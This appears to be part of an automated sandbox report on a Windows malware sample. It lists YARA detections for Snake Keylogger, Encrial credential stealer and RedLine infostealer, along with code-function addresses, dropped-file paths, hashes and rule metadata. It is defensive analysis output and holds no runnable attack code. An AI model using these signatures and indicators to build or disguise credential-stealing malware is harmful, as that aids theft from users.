                  Source: 15.2.RegSvcs.exe.2d30000.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 15.2.RegSvcs.exe.2d30000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 15.2.RegSvcs.exe.2d30000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 15.2.RegSvcs.exe.3f0f990.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 15.2.RegSvcs.exe.3f0f990.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 15.2.RegSvcs.exe.3ee5570.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 15.2.RegSvcs.exe.3ee5570.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 12.2.differences.exe.3ee0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 15.2.RegSvcs.exe.2a41086.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 15.2.RegSvcs.exe.2a41086.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0000000C.00000002.1924522530.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 0000000F.00000002.2932151290.0000000002A01000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000004.00000002.1762544925.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 0000000F.00000002.2966793878.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000000F.00000002.2971534610.0000000005360000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000000F.00000002.2971534610.0000000005360000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0000000F.00000002.2944400846.0000000002D30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000000F.00000002.2944400846.0000000002D30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0000000A.00000002.1905647858.0000000004080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Binary is likely a compiled AutoIt script file
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: This is a third-party compiled AutoIt script.1_2_00403B3A
                  Source: x.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: x.exe, 00000001.00000003.1735418066.0000000004153000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_6b581674-c
                  Source: x.exe, 00000001.00000003.1735418066.0000000004153000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_dbd59a85-3
                  Source: x.exe, 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_9ec9c3cb-3
                  Source: x.exe, 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_c4334cf4-3
                  Windows Scripting host queries suspicious COM object (likely to drop second stage)
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_0046A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,1_2_0046A1EF
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00458310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,1_2_00458310
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_004651BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,1_2_004651BD
                  Source: C:\Windows\System32\alg.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Roaming\31d53b0537b9f482.binJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_0040E6A01_2_0040E6A0
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_0042D9751_2_0042D975
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_0040FCE01_2_0040FCE0
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_004221C51_2_004221C5
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_004362D21_2_004362D2
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_004803DA1_2_004803DA
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_0043242E1_2_0043242E
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_004225FA1_2_004225FA
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_0045E6161_2_0045E616
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_004166E11_2_004166E1
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_0043878F1_2_0043878F
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_004368441_2_00436844
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_004808571_2_00480857
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_004188081_2_00418808
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_004688891_2_00468889
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_0042CB211_2_0042CB21
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00436DB61_2_00436DB6
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00416F9E1_2_00416F9E
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_004130301_2_00413030
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_0042F1D91_2_0042F1D9
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_004231871_2_00423187
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_004012871_2_00401287
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_004214841_2_00421484
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_004155201_2_00415520
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_004276961_2_00427696
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_004157601_2_00415760
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_004219781_2_00421978
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00439AB51_2_00439AB5
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_0050FCC81_2_0050FCC8
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00487DDB1_2_00487DDB
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00421D901_2_00421D90
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_0042BDA61_2_0042BDA6
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_0040DF001_2_0040DF00
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00413FE01_2_00413FE0
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00AB00D91_2_00AB00D9
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00A76EAF1_2_00A76EAF
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00A751EE1_2_00A751EE
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00AAD5801_2_00AAD580
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00AA37801_2_00AA3780
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00AAC7F01_2_00AAC7F0
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00AB39A31_2_00AB39A3
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00AA59801_2_00AA5980
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00A77B711_2_00A77B71
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00A77F801_2_00A77F80
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00BF96501_2_00BF9650
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 4_2_009B6EAF4_2_009B6EAF
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 4_2_009E59804_2_009E5980
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 4_2_009F39A34_2_009F39A3
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 4_2_009B51EE4_2_009B51EE
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 4_2_009ED5804_2_009ED580
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 4_2_009B7F804_2_009B7F80
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 4_2_009E37804_2_009E3780
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 4_2_009EC7F04_2_009EC7F0
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 4_2_00A87FF84_2_00A87FF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00408C605_2_00408C60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0040DC115_2_0040DC11
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00407C3F5_2_00407C3F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00418CCC5_2_00418CCC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00406CA05_2_00406CA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_004028B05_2_004028B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0041A4BE5_2_0041A4BE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00408C605_2_00408C60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_004182445_2_00418244
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00402F205_2_00402F20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_004193C45_2_004193C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_004187885_2_00418788
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00402F895_2_00402F89
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00402B905_2_00402B90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_004073A05_2_004073A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_02762F265_2_02762F26
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_027614485_2_02761448
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_027614385_2_02761438
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_027611A85_2_027611A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_027611985_2_02761198
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_04EA85305_2_04EA8530
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_04EAAC605_2_04EAAC60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_04EAF5105_2_04EAF510
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_04EA85205_2_04EA8520
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_04EAED795_2_04EAED79
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_04EAB2035_2_04EAB203
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_04EA1E515_2_04EA1E51
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 6_2_0099CA206_2_0099CA20
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 6_2_0099AA636_2_0099AA63
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 6_2_009987896_2_00998789
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 6_2_009BA8106_2_009BA810
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 6_2_009979F06_2_009979F0
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 6_2_009B92A06_2_009B92A0
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 6_2_009B93B06_2_009B93B0
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 6_2_00997C006_2_00997C00
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 6_2_009C2D406_2_009C2D40
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 6_2_009BEEB06_2_009BEEB0
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 7_2_022A92A07_2_022A92A0
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 7_2_022AEEB07_2_022AEEB0
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 7_2_022A93B07_2_022A93B0
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 7_2_02287C007_2_02287C00
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 7_2_022AA8107_2_022AA810
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 7_2_022B2D407_2_022B2D40
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 7_2_022879F07_2_022879F0
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 10_2_00A939A310_2_00A939A3
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 10_2_00A8598010_2_00A85980
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 10_2_00A56EAF10_2_00A56EAF
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 10_2_00A551EE10_2_00A551EE
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 10_2_00A8D58010_2_00A8D580
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 10_2_00A57F8010_2_00A57F80
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 10_2_00A8378010_2_00A83780
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 10_2_00A8C7F010_2_00A8C7F0
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 10_2_00D3845810_2_00D38458
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 12_2_00B839A312_2_00B839A3
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 12_2_00B46EAF12_2_00B46EAF
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 12_2_00B7598012_2_00B75980
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 12_2_00B451EE12_2_00B451EE
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 12_2_00B7D58012_2_00B7D580
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 12_2_00B47F8012_2_00B47F80
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 12_2_00B7378012_2_00B73780
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 12_2_00B7C7F012_2_00B7C7F0
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeCode function: 12_2_00CE862012_2_00CE8620
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0040165015_2_00401650
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_02BC2F2615_2_02BC2F26
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_02BC143815_2_02BC1438
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_02BC144815_2_02BC1448
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_02BC11A815_2_02BC11A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_02BC119815_2_02BC1198
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_053C853015_2_053C8530
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_053CAC6015_2_053CAC60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_053CF73015_2_053CF730
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_053CB21015_2_053CB210
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_053C852015_2_053C8520
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_053CED7815_2_053CED78
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_053CED8815_2_053CED88
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_053CF51015_2_053CF510
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_053CB18D15_2_053CB18D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_053CB20315_2_053CB203
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_053C1E5115_2_053C1E51
                  Source: C:\Windows\System32\AppVClient.exeCode function: 20_2_006B7C0020_2_006B7C00
                  Source: C:\Windows\System32\AppVClient.exeCode function: 20_2_006DA81020_2_006DA810
                  Source: C:\Windows\System32\AppVClient.exeCode function: 20_2_006E2D4020_2_006E2D40
                  Source: C:\Windows\System32\AppVClient.exeCode function: 20_2_006B79F020_2_006B79F0
                  Source: C:\Windows\System32\AppVClient.exeCode function: 20_2_006D92A020_2_006D92A0
                  Source: C:\Windows\System32\AppVClient.exeCode function: 20_2_006DEEB020_2_006DEEB0
                  Source: C:\Windows\System32\AppVClient.exeCode function: 20_2_006D93B020_2_006D93B0
                  Source: C:\Windows\System32\FXSSVC.exeCode function: 23_2_008C7C0023_2_008C7C00
                  Source: C:\Windows\System32\FXSSVC.exeCode function: 23_2_008EA81023_2_008EA810
                  Source: C:\Windows\System32\FXSSVC.exeCode function: 23_2_008C79F023_2_008C79F0
                  Source: C:\Windows\System32\FXSSVC.exeCode function: 23_2_008F2D4023_2_008F2D40
                  Source: C:\Windows\System32\FXSSVC.exeCode function: 23_2_008E92A023_2_008E92A0
                  Source: C:\Windows\System32\FXSSVC.exeCode function: 23_2_008EEEB023_2_008EEEB0
                  Source: C:\Windows\System32\FXSSVC.exeCode function: 23_2_008E93B023_2_008E93B0
                  Source: C:\Windows\System32\msdtc.exeCode function: 24_2_0074A81024_2_0074A810
                  Source: C:\Windows\System32\msdtc.exeCode function: 24_2_00727C0024_2_00727C00
                  Source: C:\Windows\System32\msdtc.exeCode function: 24_2_00752D4024_2_00752D40
                  Source: C:\Windows\System32\msdtc.exeCode function: 24_2_007279F024_2_007279F0
                  Source: C:\Windows\System32\msdtc.exeCode function: 24_2_0074EEB024_2_0074EEB0
                  Source: C:\Windows\System32\msdtc.exeCode function: 24_2_007492A024_2_007492A0
                  Source: C:\Windows\System32\msdtc.exeCode function: 24_2_007493B024_2_007493B0
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: Load Driver
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: Security
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0040E1D8 appears 43 times
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 00407DE1 appears 35 times
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 00428900 appears 41 times
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 00420AE3 appears 70 times
                  Source: Acrobat.exe.3.drStatic PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
                  Source: SingleClientServicesUpdater.exe.3.drStatic PE information: Resource name: 7Z type: 7-zip archive data, version 0.4
                  Source: SingleClientServicesUpdater.exe0.3.drStatic PE information: Resource name: 7Z type: 7-zip archive data, version 0.4
                  Source: OneDriveSetup.exe.3.drStatic PE information: Resource name: PAYLOAD type: Microsoft Cabinet archive data, many, 47694794 bytes, 767 files, at 0x44 +A "adal.dll" +A "alertIcon.png", flags 0x4, number 1, extra bytes 20 in head, 6100 datablocks, 0x1503 compression
                  Source: Acrobat.exe0.3.drStatic PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
                  Source: identity_helper.exe.3.drStatic PE information: Number of sections : 12 > 10
                  Source: ie_to_edge_stub.exe.3.drStatic PE information: Number of sections : 11 > 10
                  Source: msedge_proxy.exe0.3.drStatic PE information: Number of sections : 12 > 10
                  Source: notification_click_helper.exe.3.drStatic PE information: Number of sections : 13 > 10
                  Source: pwahelper.exe0.3.drStatic PE information: Number of sections : 12 > 10
                  Source: msedge_proxy.exe.3.drStatic PE information: Number of sections : 12 > 10
                  Source: setup.exe.3.drStatic PE information: Number of sections : 13 > 10
                  Source: elevation_service.exe.3.drStatic PE information: Number of sections : 12 > 10
                  Source: msedgewebview2.exe.3.drStatic PE information: Number of sections : 14 > 10
                  Source: pwahelper.exe.3.drStatic PE information: Number of sections : 12 > 10
                  Source: msedge_pwa_launcher.exe.3.drStatic PE information: Number of sections : 13 > 10
                  Source: elevation_service.exe0.3.drStatic PE information: Number of sections : 12 > 10
                  Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                  Source: unknownDriver loaded: C:\Windows\System32\drivers\AppVStrm.sys
                  Source: 15.2.RegSvcs.exe.2d30ee8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 15.2.RegSvcs.exe.2d30ee8.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 15.2.RegSvcs.exe.3ee6458.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 15.2.RegSvcs.exe.3ee6458.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 15.2.RegSvcs.exe.2a41f6e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 15.2.RegSvcs.exe.2a41f6e.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 15.2.RegSvcs.exe.2d30ee8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
